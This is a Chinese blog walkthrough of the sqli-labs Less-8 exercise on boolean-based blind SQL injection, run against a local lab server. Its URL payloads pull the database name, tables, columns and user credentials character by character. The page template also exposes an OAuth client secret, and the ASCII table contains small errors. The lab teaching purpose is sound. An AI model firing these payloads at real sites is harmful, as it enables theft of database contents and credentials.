<!DOCTYPE HTML>
<html lang="zh-CN">


<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="utf-8">
    <meta name="keywords" content="sqli-labs-Less8, Junk Blog">
    <meta name="description" content="前言什么是 SQL 盲注？SQL盲注，就是网页不会根据你写的 sql 攻击语句返回你想要知道的错误信息，所以只能通过一些手段来猜测判断网页输出的内容。
SQL盲注的分类
布尔盲注

界面能返回两个值 “true” 或 “false” 即 “">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <title>sqli-labs-Less8 | Junk Blog</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/font-awesome.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/css/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">
    <style type="text/css">
        
    </style>

    <script src="/libs/jquery/jquery-2.2.0.min.js"></script>
</head>


<body>

<header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="container">
            <div class="nav-wrapper">
                <div class="brand-logo">
                    <a href="/" class="waves-effect waves-light">
                        
                        <img src="/medias/logo.png" class="logo-img hide-on-small-only">
                        
                        <span class="logo-span">Junk Blog</span>
                    </a>
                </div>
                

<a href="#" data-activates="mobile-nav" class="button-collapse"><i class="fa fa-navicon"></i></a>
<ul class="right">
    
    <li class="hide-on-med-and-down">
        <a href="/" class="waves-effect waves-light">
            
            <i class="fa fa-home"></i>
            
            <span>首页</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/tags" class="waves-effect waves-light">
            
            <i class="fa fa-tags"></i>
            
            <span>标签</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/categories" class="waves-effect waves-light">
            
            <i class="fa fa-bookmark"></i>
            
            <span>分类</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/archives" class="waves-effect waves-light">
            
            <i class="fa fa-archive"></i>
            
            <span>归档</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/about" class="waves-effect waves-light">
            
            <i class="fa fa-user-circle-o"></i>
            
            <span>关于</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/friends" class="waves-effect waves-light">
            
            <i class="fa fa-address-book"></i>
            
            <span>友情链接</span>
        </a>
    </li>
    
    <li>
        <a id="toggleSearch" class="waves-effect waves-light">
            <i id="searchIcon" class="mdi-action-search" title="搜索"></i>
        </a>
    </li>

</ul>

<div class="side-nav" id="mobile-nav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">Junk Blog</div>
        <div class="logo-desc">
            
            一息尚存，此志不容稍懈。
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li>
            <a href="/" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-home"></i>
                
                首页
            </a>
        </li>
        
        <li>
            <a href="/tags" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-tags"></i>
                
                标签
            </a>
        </li>
        
        <li>
            <a href="/categories" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-bookmark"></i>
                
                分类
            </a>
        </li>
        
        <li>
            <a href="/archives" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-archive"></i>
                
                归档
            </a>
        </li>
        
        <li>
            <a href="/about" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-user-circle-o"></i>
                
                关于
            </a>
        </li>
        
        <li>
            <a href="/friends" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-address-book"></i>
                
                友情链接
            </a>
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/hhkk2334/hhkk2334.github.io" class="waves-effect waves-light" target="_blank">
                <i class="fa fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>

    <div class="social-link">
    <a href="https://github.com/hhkk2334/hhkk2334.github.io" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fa fa-github"></i>
    </a>



    <a href="http://mail.qq.com/cgi-bin/qm_share?t=qm_mailme&email=RHZxdXFydXJ9dHEENTVqJysp" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fa fa-envelope-open"></i>
    </a>



    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=2515616905" class="tooltipped" data-tooltip="QQ联系我: 2515616905" data-position="top" data-delay="50">
        <i class="fa fa-qq"></i>
    </a>


</div>
</div>

            </div>
        </div>

        
        <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/hhkk2334/hhkk2334.github.io" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>
</header>





<div class="bg-cover post-cover" style="background-image: url('https://i.loli.net/2019/10/10/fjNd243SYkOcGlD.png')">
    <div class="container">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <div class="description center-align post-title">
                        sqli-labs-Less8
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>



<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        margin: 35px 0 15px 0;
        padding-left: 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #toc-content .is-active-link::before {
        background-color: #42b983;
    }
</style>
<div class="row">
    <div class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/sqli-labs/" target="_blank">
                                <span class="chip bg-color">sqli-labs</span>
                            </a>
                        
                            <a href="/tags/SQL-Injection/" target="_blank">
                                <span class="chip bg-color">SQL Injection</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fa fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/Web-security/" class="post-category" target="_blank">
                                Web security
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                <div class="post-date info-break-policy">
                    <i class="fa fa-calendar-minus-o fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2019-10-08
                </div>

                
                    
                    <div class="info-break-policy">
                        <i class="fa fa-file-word-o fa-fw"></i>文章字数:&nbsp;&nbsp;
                        1.1k
                    </div>
                    

                    
                    <div class="info-break-policy">
                        <i class="fa fa-clock-o fa-fw"></i>阅读时长:&nbsp;&nbsp;
                        5 分
                    </div>
                    
                
				
				
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="fa fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">
        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><h2 id="什么是-SQL-盲注？"><a href="#什么是-SQL-盲注？" class="headerlink" title="什么是 SQL 盲注？"></a>什么是 SQL 盲注？</h2><p>SQL盲注，就是网页不会根据你写的 sql 攻击语句返回你想要知道的错误信息，所以只能通过一些手段来猜测判断网页输出的内容。</p>
<h2 id="SQL盲注的分类"><a href="#SQL盲注的分类" class="headerlink" title="SQL盲注的分类"></a>SQL盲注的分类</h2><ul>
<li>布尔盲注</li>
</ul>
<p>界面能返回两个值 “true” 或 “false” 即 “布尔值” 。当你输入的 SQL 攻击语句成功后，网页返回值为 “true”，也就是说网页会输出正常的界面；当你输入的SQL攻击语句失败后，网页返回值为 “false”，也就是说网页会输出不正常的界面（比如网页少了部分内容）</p>
<ul>
<li>时间盲注</li>
</ul>
<p>界面只能返回一个值 “true”，无论你输入任何值，网页都是按正常来处理。此时，SQL 攻击语句中会加入时间函数来判断注入的语句是否正确。比如我通过“时间函数”让网页等待10秒再返回正常的界面。如果我等待了10秒才接受到正常界面，说面我的注入语句是正确的；如果我很快就接受到正常的界面，说明我的注入语句是错误的。</p>
<h2 id="基础知识"><a href="#基础知识" class="headerlink" title="基础知识"></a>基础知识</h2><p>对于布尔盲注,需要先了解 length()、substr()、ascii() 这三个函数的功能。</p>
<p>length(str)：返回字符串（str）的长度</p>
<p><img src="https://i.loli.net/2019/10/09/zYrp1isWEgIDP7B.png" alt="less8-1.png"></p>
<p>substr(str,pos,len)：从字符串（str）的第几个字符（pos）开始截取多长的字符串（len）</p>
<p><img src="https://i.loli.net/2019/10/09/7hM3U9rWznldDXq.png" alt="less8-2.png"></p>
<p>ascii(str)：将字符串（str）转换成 ascii 码</p>
<p><img src="https://i.loli.net/2019/10/09/Afoa3q1tXkNYhCI.png" alt="less8-3.png"></p>
<p>常用的 ascii</p>
<table>
<thead>
<tr>
<th align="center">ASCII值</th>
<th align="center">字符</th>
<th align="center">ASCII值</th>
<th align="center">字符</th>
<th align="center">ASCII值</th>
<th align="center">字符</th>
<th align="center">ASCII值</th>
<th align="center">字符</th>
<th align="center">ASCII值</th>
<th align="center">字符</th>
</tr>
</thead>
<tbody><tr>
<td align="center">48</td>
<td align="center">0</td>
<td align="center">65</td>
<td align="center">A</td>
<td align="center">75</td>
<td align="center">K</td>
<td align="center">85</td>
<td align="center">U</td>
<td align="center">101</td>
<td align="center">e</td>
</tr>
<tr>
<td align="center">49</td>
<td align="center">1</td>
<td align="center">66</td>
<td align="center">B</td>
<td align="center">76</td>
<td align="center">L</td>
<td align="center">86</td>
<td align="center">V</td>
<td align="center">102</td>
<td align="center">f</td>
</tr>
<tr>
<td align="center">50</td>
<td align="center">2</td>
<td align="center">67</td>
<td align="center">C</td>
<td align="center">77</td>
<td align="center">M</td>
<td align="center">87</td>
<td align="center">W</td>
<td align="center">103</td>
<td align="center">g</td>
</tr>
<tr>
<td align="center">51</td>
<td align="center">3</td>
<td align="center">68</td>
<td align="center">D</td>
<td align="center">78</td>
<td align="center">N</td>
<td align="center">88</td>
<td align="center">X</td>
<td align="center">104</td>
<td align="center">h</td>
</tr>
<tr>
<td align="center">52</td>
<td align="center">4</td>
<td align="center">69</td>
<td align="center">E</td>
<td align="center">79</td>
<td align="center">O</td>
<td align="center">89</td>
<td align="center">Y</td>
<td align="center">105</td>
<td align="center">i</td>
</tr>
<tr>
<td align="center">53</td>
<td align="center">5</td>
<td align="center">70</td>
<td align="center">F</td>
<td align="center">80</td>
<td align="center">P</td>
<td align="center">90</td>
<td align="center">Z</td>
<td align="center">106</td>
<td align="center">j</td>
</tr>
<tr>
<td align="center">54</td>
<td align="center">6</td>
<td align="center">71</td>
<td align="center">G</td>
<td align="center">81</td>
<td align="center">Q</td>
<td align="center">97</td>
<td align="center">a</td>
<td align="center">107</td>
<td align="center">k</td>
</tr>
<tr>
<td align="center">55</td>
<td align="center">7</td>
<td align="center">72</td>
<td align="center">H</td>
<td align="center">82</td>
<td align="center">R</td>
<td align="center">98</td>
<td align="center">b</td>
<td align="center">108</td>
<td align="center">l</td>
</tr>
<tr>
<td align="center">56</td>
<td align="center">8</td>
<td align="center">73</td>
<td align="center">I</td>
<td align="center">83</td>
<td align="center">S</td>
<td align="center">99</td>
<td align="center">c</td>
<td align="center">109</td>
<td align="center">m</td>
</tr>
<tr>
<td align="center">56</td>
<td align="center">9</td>
<td align="center">74</td>
<td align="center">J</td>
<td align="center">84</td>
<td align="center">T</td>
<td align="center">100</td>
<td align="center">d</td>
<td align="center">110</td>
<td align="center">n</td>
</tr>
</tbody></table>
<table>
<thead>
<tr>
<th align="center">ASCII值</th>
<th align="center">字符</th>
<th align="center">ASCII值</th>
<th align="center">字符</th>
<th align="center">ASCII值</th>
<th align="center">字符</th>
<th align="center">ASCII值</th>
<th align="center">字符</th>
<th align="center">ASCII值</th>
<th align="center">字符</th>
</tr>
</thead>
<tbody><tr>
<td align="center">111</td>
<td align="center">o</td>
<td align="center">112</td>
<td align="center">p</td>
<td align="center">113</td>
<td align="center">q</td>
<td align="center">114</td>
<td align="center">r</td>
<td align="center">115</td>
<td align="center">s</td>
</tr>
<tr>
<td align="center">116</td>
<td align="center">t</td>
<td align="center">117</td>
<td align="center">u</td>
<td align="center">118</td>
<td align="center">v</td>
<td align="center">119</td>
<td align="center">w</td>
<td align="center">120</td>
<td align="center">x</td>
</tr>
<tr>
<td align="center">121</td>
<td align="center">y</td>
<td align="center">122</td>
<td align="center">z</td>
<td align="center">&nbsp;</td>
<td align="center">&nbsp;</td>
<td align="center">&nbsp;</td>
<td align="center">&nbsp;</td>
<td align="center">&nbsp;</td>
<td align="center">&nbsp;</td>
</tr>
</tbody></table>
<h2 id="工作原理"><a href="#工作原理" class="headerlink" title="工作原理"></a>工作原理</h2><ol>
<li><p>使用 ascii() + length() 函数判断出查询内容的字符长度</p>
</li>
<li><p>多次使用 ascii() + substr() 函数判断每个字符</p>
</li>
<li><p>将判断出的字符整合，得到查询结果。</p>
</li>
</ol>
<h1 id="注入步骤"><a href="#注入步骤" class="headerlink" title="注入步骤"></a>注入步骤</h1><h2 id="基于布尔的单引号GET盲注"><a href="#基于布尔的单引号GET盲注" class="headerlink" title="基于布尔的单引号GET盲注"></a>基于布尔的单引号GET盲注</h2><ol>
<li><strong>输入字符使网页报错,判断执行的 SQL 语句</strong></li>
</ol>
<pre><code>http://192.168.150.128/sqli-labs-master/Less-8/?id=1'</code></pre><p><img src="https://i.loli.net/2019/10/09/XP1AsxCu6iI8Rpj.png" alt="less8-4.png"></p>
<p>注：网页不是正常界面，使用布尔盲注进行测试</p>
<ol start="2">
<li><strong>判断数据库字符串的长度</strong></li>
</ol>
<pre><code>http://192.168.150.128/sqli-labs-master/Less-8/?id=1' and ascii(length((select database())))&gt;55%23</code></pre><p><img src="https://i.loli.net/2019/10/09/Yei8ndPQJ39HzGB.png" alt="less8-5.png"></p>
<pre><code>http://192.168.150.128/sqli-labs-master/Less-8/?id=1' and ascii(length((select database())))&gt;56%23</code></pre><p><img src="https://i.loli.net/2019/10/09/ZRunGcPSwdhg5bT.png" alt="less8-6.png"></p>
<pre><code>http://192.168.150.128/sqli-labs-master/Less-8/?id=1' and ascii(length((select database())))=56%23</code></pre><p><img src="https://i.loli.net/2019/10/09/sePb4EIMOg19KW6.png" alt="less8-7.png"></p>
<ol start="3">
<li><strong>判断数据库</strong></li>
</ol>
<p><strong>判断第一个字母</strong></p>
<pre><code>http://192.168.150.128/sqli-labs-master/Less-8/?id=1' and ascii(substr((select database()),1,1))&gt;110%23</code></pre><p><img src="https://i.loli.net/2019/10/09/KE7wlrNu1GSgVav.png" alt="less8-8.png"></p>
<pre><code>http://192.168.150.128/sqli-labs-master/Less-8/?id=1' and ascii(substr((select database()),1,1))&gt;115%23</code></pre><p><img src="https://i.loli.net/2019/10/09/eFXs9IfU2nNCASH.png" alt="less8-9.png"></p>
<pre><code>http://192.168.150.128/sqli-labs-master/Less-8/?id=1' and ascii(substr((select database()),1,1))=115%23</code></pre><p><img src="https://i.loli.net/2019/10/09/r8f1K9OlnySh3FC.png" alt="less8-10.png"></p>
<p>注：第一个字符串的 ascii 值为 115，从上面的 ascii 表中可以找到相应的字符为 “ s ” </p>
<p><strong>判断第二个字母</strong></p>
<pre><code>http://192.168.150.128/sqli-labs-master/Less-8/?id=1' and ascii(substr((select database()),2,1))&gt;100%23</code></pre><p><img src="https://i.loli.net/2019/10/09/DzgLq2x9WAtwKF7.png" alt="less8-11.png"></p>
<pre><code>http://192.168.150.128/sqli-labs-master/Less-8/?id=1' and ascii(substr((select database()),2,1))&gt;101%23</code></pre><p><img src="https://i.loli.net/2019/10/09/w2CADSa6zbhXlNG.png" alt="less8-12.png"></p>
<pre><code>http://192.168.150.128/sqli-labs-master/Less-8/?id=1' and ascii(substr((select database()),2,1))=101%23</code></pre><p><img src="https://i.loli.net/2019/10/09/AMoWTIfOYiZkuJ9.png" alt="less8-13.png"></p>
<p>注：第一个字符串的 ascii 值为 101，从上面的 ascii 表中可以找到相应的字符为 “ e ” </p>
<ol start="4">
<li><strong>判断表</strong></li>
</ol>
<pre><code>http://192.168.150.128/sqli-labs-master/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101%23</code></pre><p><img src="https://i.loli.net/2019/10/15/2PojderbXO8pgEM.png" alt="less8-14.png"></p>
<ol start="5">
<li><strong>判断字段</strong></li>
</ol>
<pre><code>http://192.168.150.128/sqli-labs-master/Less-8/?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security' AND TABLE_NAME='users' limit 0,1),1,1))=105%23</code></pre><p><img src="https://i.loli.net/2019/10/15/QYyNs4O2FdEibtj.png" alt="less8-15.png"></p>
<ol start="6">
<li><strong>判断数据</strong></li>
</ol>
<pre><code>http://192.168.150.128/sqli-labs-master/Less-8/?id=1' and ascii(substr((select username FROM security.users limit 0,1),1,1))=68%23</code></pre><p><img src="https://i.loli.net/2019/10/15/oga2zSMfjBPUFtL.png" alt="less8-16.png"></p>
<pre><code>http://192.168.150.128/sqli-labs-master/Less-8/?id=1' and ascii(substr((select password FROM security.users limit 0,1),1,1))=68%23</code></pre><p><img src="https://i.loli.net/2019/10/15/aebTfXqFs8iWMZ9.png" alt="less8-17.png"></p>
<h1 id="reference"><a href="#reference" class="headerlink" title="reference"></a>reference</h1><p><a href="https://www.cnblogs.com/omnis/p/8318639.html" target="_blank" rel="noopener">【sqli-labs】 less8 GET - Blind - Boolian Based - Single Quotes (基于布尔的单引号GET盲注)</a></p>
<script>
        document.querySelectorAll('.github-emoji')
          .forEach(el => {
            if (!el.dataset.src) { return; }
            const img = document.createElement('img');
            img.style = 'display:none !important;';
            img.src = el.dataset.src;
            img.addEventListener('error', () => {
              img.remove();
              el.style.color = 'inherit';
              el.style.backgroundImage = 'none';
              el.style.background = 'none';
            });
            img.addEventListener('load', () => {
              img.remove();
            });
            document.body.appendChild(img);
          });
      </script>
            </div>
            <hr/>

            

            <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">

<div id="article-share">
    
    <div class="social-share" data-disabled="qzone" data-wechat-qrcode-helper="<p>微信里点“发现”->“扫一扫”二维码便可查看分享。</p>"></div>
    
</div>

<script src="/libs/share/js/social-share.min.js"></script>

            <div class="reprint">
                <p>
                    <span class="reprint-tip">
                        <i class="fa fa-exclamation-circle"></i>&nbsp;&nbsp;转载请注明:
                    </span>
                    <a href="https://github.com/hhkk2334/hhkk2334.github.io" class="b-link-green">Junk Blog</a>
                    <i class="fa fa-angle-right fa-lg fa-fw text-color"></i>
                    <a href="/2019/10/08/sqli-labs-Less8/" class="b-link-green">sqli-labs-Less8</a>
                </p>
            </div>
        </div>
    </div>

    

    
        <link rel="stylesheet" href="/libs/gitment/gitment-default.css">
<link rel="stylesheet" href="/css/gitment.css">

<div class="gitment-card card" data-aos="fade-up">
    <div id="gitment-content" class="card-content"></div>
</div>

<script src="/libs/gitment/gitment.js"></script>
<script>
var gitment = new Gitment({
    id: 'Tue Oct 08 2019 23:02:42 GMT+0800',
    owner: '315053891',
    repo: 'hhkk2334.github.io',
    oauth: {
        client_id: '2ba8ba1b984aa89bf7cf',
        client_secret: 'eb1541997c7ddce00df527e897e7419e105f6b04'
    }
});

gitment.render('gitment-content');
</script>
    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fa fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2019/10/13/我的博客/">
                    <div class="card-image">
                        
                        <img src="https://i.loli.net/2019/10/13/NTc7MfD3gyJsadO.jpg" class="responsive-img" alt="我的博客">
                        
                        <span class="card-title">我的博客</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary">我为什么写博客？因为受朋友的影响，很早之前就在写笔记。写笔记的初衷是整合、巩固、记录自己学习的知识，如果有一天，我想回顾这些知识点，对照着曾经记录的笔记，会起到事半功倍的效果。但是时间长了，发现自己一直在偷懒，笔记写得囫囵吞枣，而且写着写着</div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="fa fa-clock-o fa-fw icon-date"></i>2019-10-13
                        </span>
                        <span class="publish-author">
                            
                            <i class="fa fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/杂谈/" class="post-category" target="_blank">
                                    杂谈
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fa fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2019/10/05/sqli-labs-Less7/">
                    <div class="card-image">
                        
                        <img src="https://i.loli.net/2019/10/10/3eZ9bGryn1WOsD8.png" class="responsive-img" alt="sqli-labs-Less7">
                        
                        <span class="card-title">sqli-labs-Less7</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary">前言这次的标题是 dump into file 经过一些简单的测试，发现报错注入行不同，一些正常的注入也没有回显。所以结合标题 说明这题需要新的思路和手段。
基础知识outfile：导出检索出的数据loadfile：将表的内容导出为一个文本</div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="fa fa-clock-o fa-fw icon-date"></i>2019-10-05
                            </span>
                        <span class="publish-author">
                            
                            <i class="fa fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/Web-security/" class="post-category" target="_blank">
                                    Web security
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/sqli-labs/" target="_blank">
                        <span class="chip bg-color">sqli-labs</span>
                    </a>
                    
                    <a href="/tags/SQL-Injection/" target="_blank">
                        <span class="chip bg-color">SQL Injection</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>
</div>


<script>
    $('#articleContent').on('copy', function (e) {
        // IE8 or earlier browser is 'undefined'
        if (typeof window.getSelection === 'undefined') return;

        var selection = window.getSelection();
        // if the selection is short let's not annoy our users.
        if (('' + selection).length < Number.parseInt('120')) {
            return;
        }

        // create a div outside of the visible area and fill it with the selected text.
        var bodyElement = document.getElementsByTagName('body')[0];
        var newdiv = document.createElement('div');
        newdiv.style.position = 'absolute';
        newdiv.style.left = '-99999px';
        bodyElement.appendChild(newdiv);
        newdiv.appendChild(selection.getRangeAt(0).cloneContents());

        // we need a <pre> tag workaround.
        // otherwise the text inside "pre" loses all the line breaks!
        if (selection.getRangeAt(0).commonAncestorContainer.nodeName === 'PRE') {
            newdiv.innerHTML = "<pre>" + newdiv.innerHTML + "</pre>";
        }

        var url = document.location.href;
        newdiv.innerHTML += '<br />'
            + '来源: Junk Blog<br />'
            + '作者: Trash Can,Trash Can<br />'
            + '链接: <a href="' + url + '">' + url + '</a><br />'
            + '本文章著作权归作者所有，任何形式的转载都请注明出处。';

        selection.selectAllChildren(newdiv);
        window.setTimeout(function () {bodyElement.removeChild(newdiv);}, 200);
    });
</script>

    </div>
    <div class="col l3 hide-on-med-and-down">
        <div class="toc-widget">
            <div class="toc-title"><i class="fa fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            // headingsOffset: -205,
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });
    });
</script>
    

</main>


<footer class="page-footer bg-color">
    <div class="container row center-align">
        <div class="col s12 m8 l8 copy-right" >
             Copyright&nbsp;&copy;
            <span id="year">年份</span>
            <a href="https://github.com/hhkk2334/hhkk2334.github.io" target="_blank">Trash Can,Trash Can</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                class="white-color">27.7k</span>&nbsp;字
               
            
			
                <br>
                
                <span id="busuanzi_container_site_pv">
                    <i class="fa fa-heart-o"></i>
                    本站总访问量 <span id="busuanzi_value_site_pv" class="white-color"></span>
                </span>
                
                
                <span id="busuanzi_container_site_uv">
                    <i class="fa fa-users"></i>
                    次,&nbsp;访客数 <span id="busuanzi_value_site_uv" class="white-color"></span> 人.
                </span>
                
            
        </div>
		<div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/hhkk2334/hhkk2334.github.io" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fa fa-github"></i>
    </a>



    <a href="http://mail.qq.com/cgi-bin/qm_share?t=qm_mailme&email=RHZxdXFydXJ9dHEENTVqJysp" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fa fa-envelope-open"></i>
    </a>



    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=2515616905" class="tooltipped" data-tooltip="QQ联系我: 2515616905" data-position="top" data-delay="50">
        <i class="fa fa-qq"></i>
    </a>


</div>
    </div>
</footer>

<div class="progress-bar"></div>


<!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fa fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input" autofocus="">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script src="/js/search.js"></script>
<script type="text/javascript">
    searchFunc("/" + "search.xml", 'searchInput', 'searchResult');
</script>
<!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
